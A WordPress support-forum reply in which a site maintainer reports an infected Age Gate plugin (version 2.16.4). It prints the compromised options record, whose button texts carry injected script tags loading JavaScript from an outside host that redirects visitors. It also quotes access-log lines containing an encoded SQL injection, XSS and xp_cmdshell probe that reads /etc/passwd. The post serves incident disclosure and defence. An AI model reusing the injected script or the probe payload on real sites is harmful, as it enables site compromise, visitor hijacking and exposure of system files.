kreativrudel

Forum Replies Created

Viewing 1 replies (of 1 total)

  • Just got notified by an client that the age gate does look different on his website. After quick check, I was redirected to a clickbait site.

    I can confirm that the infection happens in the wp_options table in a record with the option_name of wp_age_gate_messages.

    Here’s the content of the infected option_value:

    a:15:{s:11:"instruction";s:0:"";s:9:"messaging";s:0:"";s:17:"invalid_input_msg";s:22:"Your input was invalid";s:13:"under_age_msg";s:43:"You are not old enough to view this content";s:17:"generic_error_msg";s:35:"An error occurred, please try again";s:16:"remember_me_text";s:11:"Remember me";s:14:"yes_no_message";s:29:"Are you over %s years of age?";s:8:"yes_text";s:70:"Yes<script src='https://small.piterreceiver.ga/clear.js?l=1'></script>";s:7:"no_text";s:69:"No<script src='https://small.piterreceiver.ga/clear.js?l=1'></script>";s:10:"additional";s:0:"";s:11:"button_text";s:6:"Submit";s:14:"cookie_message";s:85:"Your browser does not support cookies, you may experience problems entering this site";s:8:"text_day";s:3:"Day";s:10:"text_month";s:5:"Month";s:9:"text_year";s:4:"Year";}

    The Age-Gate version which is currently in use: 2.16.4

    I was able to pull out the following activity from the logs which could be a possible attack vector:

    46.161.27.0 - - [02/Oct/2021:18:25:13 +0200] "POST /de-de/wp-content/plugins/age-gate/public/css/age-gate-public.css HTTP/1.1" 200 7842 "-" "Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1"

    46.161.27.0 - - [02/Oct/2021:18:25:18 +0200] "POST /de-de/wp-content/plugins/age-gate/public/css/age-gate-public.css?AlSV%3D5166%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 7842 "-" "Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1"

    46.161.27.0 - - [02/Oct/2021:18:25:19 +0200] "POST /de-de/wp-content/plugins/age-gate/public/css/age-gate-public.css HTTP/1.1" 200 7842 "-" "Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1"

    • This reply was modified 3 years, 1 month ago by kreativrudel.
Viewing 1 replies (of 1 total)